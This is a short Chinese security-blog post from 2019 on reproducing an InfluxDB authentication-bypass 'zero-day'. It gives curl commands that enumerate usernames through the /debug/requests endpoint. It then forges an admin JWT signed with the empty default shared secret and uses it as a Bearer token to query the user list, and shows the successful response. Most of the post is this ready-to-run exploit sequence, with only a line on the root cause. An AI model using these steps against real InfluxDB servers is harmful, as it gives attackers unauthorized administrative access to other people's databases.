influxdb认证绕过0day

a02845 2019-06-05 jwt token 0day influxdb

0day复现步骤:

1. 查找user name

curl -G "http://xxx:8086/debug/requests"

2. 构造jwt token

在线构造地址

jwt_token

3. 构造认证头

curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU5Mjg0OTM1fQ.tUClNot9LgStSw57n26DSn-3NPkBiHizk-XOHMfJJJw'

返回

{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true],["read",false],["write",false],["telegraf",true]]}]}]}

成功

漏洞原理

JWT token shared-secret 默认为空

JWT说明

0day原文

上一篇：Superl-url：一款开源关键词URL采集工具下一篇：一次不完美的Jboss渗透

请发表您的评论

不容错过

DNSlivery：通过DNS发送文件和payload的工具
桑云信息安云2019-10-01
从攻守日志看网络江湖的快意恩仇
桑云信息安云2019-05-12
NASA自曝遭入侵，黑客利用树莓派窃取500MB火星任务数据
萧寒2019-06-24
一张图就是一份木马？谨防游戏交易诈骗
桑云信息Lzers2021-07-21

Copyright © 2021 HEIBAI.ORG.CN All Rights Reserved. 网站ICP备案

蜀ICP备2021014542号-2 | 公安网备案

川公网安备 51118102000215号

Powered By SangYun.Net